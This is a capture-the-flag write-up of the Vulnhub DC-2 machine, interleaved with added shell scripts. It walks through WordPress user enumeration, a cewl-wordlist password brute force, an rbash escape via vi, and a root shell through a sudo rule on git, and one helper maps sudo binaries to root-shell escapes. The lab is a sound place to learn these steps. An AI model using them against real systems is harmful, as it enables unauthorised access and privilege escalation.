DC-2 Final

This document summarizes the penetration testing of the DC-2 VULNHUB machine. It involved discovering the target IP, scanning ports with Nmap, adding the domain to the host file, finding HTTP and SSH services running, using WPscan and cewl to enumerate usernames and passwords, logging into WordPress and SSH, escaping the restricted SSH shell to read flags, and using sudo privileges to escalate to root and read the final flag. Privilege escalation was achieved by using sudo access to /usr/bin/git to gain root permissions.

Uploaded by pafora
DC-2 VULNHUB

PROJECT REPORT

HAREESH K P
[email protected]
CONTENTS

• Introduction
• Active information gathering
• Vulnerability scanning
• Exploitation
• Enumeration and privilege escalation
• Important takeaways from this lab
INTRODUCTION
The objective is to find the five flags. Each flag is a hint for the
next step, and its location indicates where a good penetration tester
should look. An alternative approach is to go directly for root.
Penetration methodology
• Discovering the target's IP
• Network scanning (Nmap)
• Adding the domain name to the hosts file
• Browsing the HTTP service
• Using WPScan for username enumeration
• Using cewl to create a wordlist
• Logging into WordPress
• Logging in through SSH
• Escaping the restricted shell
• Finding a binary in the sudoers list
• Getting root access and reading the final flag
Active information gathering
• Host discovery and port scanning

Only two services were found running on the target: HTTP and SSH, with
SSH listening on the non-standard port 7744 rather than 22. A running
HTTP service means there is a website to look at. The site redirects to
the hostname dc-2, so that name has to be mapped to the target's IP in
the hosts file before the pages render. Browsing the site gives us the
first flag: the Flag entry in the site menu immediately caught our
attention, and the page behind it holds a really useful hint for the
next step, namely that the usual wordlists will not work and a
site-specific one should be built with cewl.
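The recon step above, scripted, as an added example that is not part of the original report: parse nmap's grepable output for open ports and add the hostname mapping to a hosts file without creating duplicates. The nmap line is a constructed sample shaped after the report's findings (HTTP, plus SSH on 7744); the IP 192.168.1.10, the temporary hosts file and the nmap invocation in the comment are assumptions.

```shell
#!/bin/bash
# Added example (not from the original report): parse nmap's grepable output
# and map the target's hostname in a hosts file. The nmap line below is a
# constructed sample shaped like the scan described in the report (HTTP plus
# SSH on the non-standard port 7744); the IP and the hosts file path are
# assumptions. A real run that covers every port, not just nmap's default
# top 1000 (which would have missed 7744), is:
#   sudo nmap -sV -p- -oG scan.gnmap 192.168.1.10
NMAP_GREPABLE='Host: 192.168.1.10 ()  Ports: 80/open/tcp//http///, 7744/open/tcp//ssh///'

# Print "port/service" for every open port in grepable (-oG) output read from stdin.
open_ports() {
    sed -n 's/.*Ports: //p' \
      | tr ',' '\n' \
      | sed 's/^ *//' \
      | awk -F/ '$2 == "open" { print $1 "/" $5 }'
}

# Append "ip<TAB>name" to a hosts file unless the name is already mapped,
# so re-running the recon script never produces duplicate entries.
add_host_entry() {
    hosts_file=$1; ip=$2; name=$3
    if ! grep -q "[[:space:]]$name\$" "$hosts_file" 2>/dev/null; then
        printf '%s\t%s\n' "$ip" "$name" >> "$hosts_file"
    fi
}

# Stand-alone demo: write to a temporary hosts file rather than /etc/hosts.
demo_hosts=$(mktemp)
printf '%s\n' "$NMAP_GREPABLE" | open_ports
add_host_entry "$demo_hosts" 192.168.1.10 dc-2
add_host_entry "$demo_hosts" 192.168.1.10 dc-2   # second call is a no-op
cat "$demo_hosts"
rm -f "$demo_hosts"
```

Against a real target, pipe the saved scan.gnmap into open_ports and point add_host_entry at /etc/hosts (as root) once the IP is known; the idempotent check matters because recon scripts tend to be re-run many times during a lab.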

Vulnerability scan
Since this is my own lab environment, I moved straight to this step.
The target is a WordPress site, so the first idea was to run WPScan
against it and see what the scan enumerates.
The results gave us two things:
1. File enumeration: /wp-login.php , …. , /readme.html
2. User enumeration: admin, tom, jerry

Brute forcing these usernames against the cewl wordlist gave the
following results:

1. admin: we have only validated that the user exists; no password was
found for it.
2. jerry: validated, with the password adipiscing.
3. tom: validated, with the password parturient.
We log in to WordPress with jerry's and tom's credentials and look for
our flags. Traversing the admin panel, we find flag2.
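The credential-guessing step, as an added example that is not part of the original report: a minimal cewl-style wordlist builder that can be run offline, so it is clear why a site-specific list succeeds where a generic one fails. The HTML below is a constructed sample, not DC-2's real page; the cewl and wpscan command lines in the comment use the tools' real option names, and the hostname dc-2 is the one the report maps in its hosts file.

```shell
#!/bin/bash
# Added example (not from the original report): a minimal cewl-style wordlist
# builder. cewl spiders a site and keeps every word of at least three letters;
# the report's successful passwords (adipiscing, parturient) are ordinary
# page words, which is why a site-specific list works where rockyou does not.
# The HTML below is a constructed sample, not DC-2's real page.
SAMPLE_HTML='<html><body><h1>Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam parturient
montes, nascetur ridiculus mus. Flag 1 is not here.</p></body></html>'

# Strip tags, split on anything that is not a letter, keep words of at least
# $1 letters (cewl's default minimum is 3), de-duplicate. Reads HTML on stdin.
build_wordlist() {
    min_len=${1:-3}
    sed 's/<[^>]*>/ /g' \
      | tr -cs 'A-Za-z' '\n' \
      | awk -v n="$min_len" 'length($0) >= n' \
      | sort -u
}

# The real tooling, for reference:
#   cewl http://dc-2/ -m 3 -w words.txt                   # spider, min length 3
#   wpscan --url http://dc-2/ -e u                        # enumerate users
#   wpscan --url http://dc-2/ -U users.txt -P words.txt   # password attack
printf '%s\n' "$SAMPLE_HTML" | build_wordlist 3
```

The real cewl additionally follows links to a configurable depth and can keep e-mail addresses and metadata; this version only shows the core idea that the candidate passwords come from the site's own text.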

Flag2's clue told us to find another entry point to reach the final
flag, so the obvious next move was the SSH service running on port 7744,
logging in with Tom's WordPress credentials.

ssh [email protected] -p 7744


ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin
Enumeration and Privilege Escalation
Tom's shell is a restricted one: echo $PATH shows that it only searches
/home/tom/usr/bin, which holds just a few programs, and cat is not one
of them, so flag3.txt cannot be read directly.
One of the programs that is available is the vi editor, and vi can
start a shell of its own choosing, so we use it to escape the restricted
shell by typing the following inside vi:
:set shell=/bin/bash
:shell
After escaping, PATH and SHELL still carry the restricted values, so we
set SHELL to /bin/bash and put /bin and /usr/bin on PATH so that
ordinary Linux commands resolve. SHELL is a single path, so unlike PATH
it is not extended with a colon:
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
Now cat works, and opening flag3.txt again gives us the next hint:
ls
cat flag3.txt
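What the restricted shell actually refuses, and the environment fix to apply once it has been escaped, as an added example that is not part of the original report. It starts throwaway restricted bash processes (bash -r, the same thing rbash is) so nothing touches the current shell; it assumes bash is installed.

```shell
#!/bin/bash
# Added example (not from the original report): what a restricted bash (rbash)
# refuses, and the environment fix to apply once you have escaped it.
# Requires bash; each probe starts a throwaway `bash -r` so nothing here
# touches the current shell.

# Run one command line under restricted bash; print "blocked" if rbash refuses it.
rbash_probe() {
    if bash -r -c "$1" >/dev/null 2>&1; then
        echo allowed
    else
        echo blocked
    fi
}

# The escape used in the report: tom's PATH contains vi, and vi can spawn a
# shell of its choosing. Inside vi type:
#     :set shell=/bin/bash
#     :shell
# That gives an unrestricted bash, but PATH and SHELL are still the rbash
# values, so the report's next step is the export below (note that SHELL is a
# single path, not a colon-separated list like PATH).
fix_environment() {
    export PATH=/usr/local/bin:/usr/bin:/bin:$PATH
    export SHELL=/bin/bash
    command -v cat      # now resolves, whereas the rbash PATH had no cat
}

# Probes: plain command, cd, changing PATH, a slash in the command name, and
# output redirection. Only the first one is allowed under rbash.
for probe in 'echo ok' 'cd /' 'PATH=/bin:/usr/bin' '/bin/ls' 'echo x > /tmp/probe'; do
    printf '%-22s %s\n' "$probe" "$(rbash_probe "$probe")"
done
fix_environment
```

The probes explain why the export has to come after the escape and not before it: inside rbash, PATH and SHELL are read-only, commands containing a slash are refused, and output cannot be redirected, so there is no way to read flag3.txt until an unrestricted shell is obtained through a program that is on the allowed PATH.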

According to the hint, we now need to switch from tom to jerry, but we
do not have jerry's login credentials. We then checked the sudoers list
and found that tom can run /usr/bin/git as root without a password:

sudo -l
Root permission on git was the cherry on the cake, because it lets a
low-privilege shell be escalated to a root shell: git sends its help
output through a pager, and the pager can spawn a shell of its own, so
running
sudo git -p help config
and then typing !/bin/sh at the pager prompt drops us into a root shell.

With root access, we change to the root directory and find the final
flag:
cd /root
ls
cat final-flag.txt
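The sudo -l check and the pager escape it leads to, as an added example that is not part of the original report: pull the NOPASSWD entries out of sudo -l output and map each binary to the shell escape that turns it into a root shell. The sample output is constructed to match what the report describes (tom may run /usr/bin/git as root without a password); the hostname DC-2 in it and the secure_path value are assumptions, and the extra entries handled by escape_hint (less, more, vi, vim) go beyond the single binary the report found.

```shell
#!/bin/bash
# Added example (not from the original report): pull the NOPASSWD entries out of
# `sudo -l` output and map them to the pager/editor shell escapes that turn such
# an entry into a root shell. The sample output is constructed to match what the
# report describes (tom may run /usr/bin/git as root without a password); the
# hostname and secure_path are assumptions.
SUDO_L_OUTPUT='Matching Defaults entries for tom on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tom may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git'

# Print one binary per line from every "(user) NOPASSWD: a, b, c" line on stdin.
nopasswd_bins() {
    sed -n 's/.*NOPASSWD: *//p' \
      | tr ',' '\n' \
      | sed 's/^ *//; s/ *$//' \
      | awk 'NF { print $1 }'     # keep the path, drop any trailing arguments
}

# Root-shell recipe for a few binaries that hand control to a pager or editor.
# git's help output goes through the pager (less by default), and less runs a
# shell when you type !/bin/sh; -p forces the pager even without a tty.
escape_hint() {
    case "$(basename "$1")" in
        git)       echo "sudo $1 -p help config    # at the pager prompt type: !/bin/sh" ;;
        less|more) echo "sudo $1 /etc/profile      # at the pager prompt type: !/bin/sh" ;;
        vi|vim)    echo "sudo $1 -c ':!/bin/sh'" ;;
        *)         echo "no pager/editor escape known here for $1; check the binary's own options" ;;
    esac
}

printf '%s\n' "$SUDO_L_OUTPUT" | nopasswd_bins | while read -r bin; do
    printf '%s -> %s\n' "$bin" "$(escape_hint "$bin")"
done
```

The defensive reading is the same as the offensive one: any NOPASSWD entry for a program that opens a pager or editor is equivalent to granting a root shell, so sudoers rules should name narrow wrappers rather than general-purpose tools like git.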
Conclusion
This was a good step up from the previous box, since we had to build
our own wordlist with cewl for the brute force. A perfect VM for
beginners. SSH can run on a port other than 22; administrators do this
to harden their setup, so a port scan has to cover the full port range
rather than just the defaults. A URL enumeration tool such as DIRB would
help find other accessible pages. We touched on sudo -l and privilege
escalation concepts to get root access.
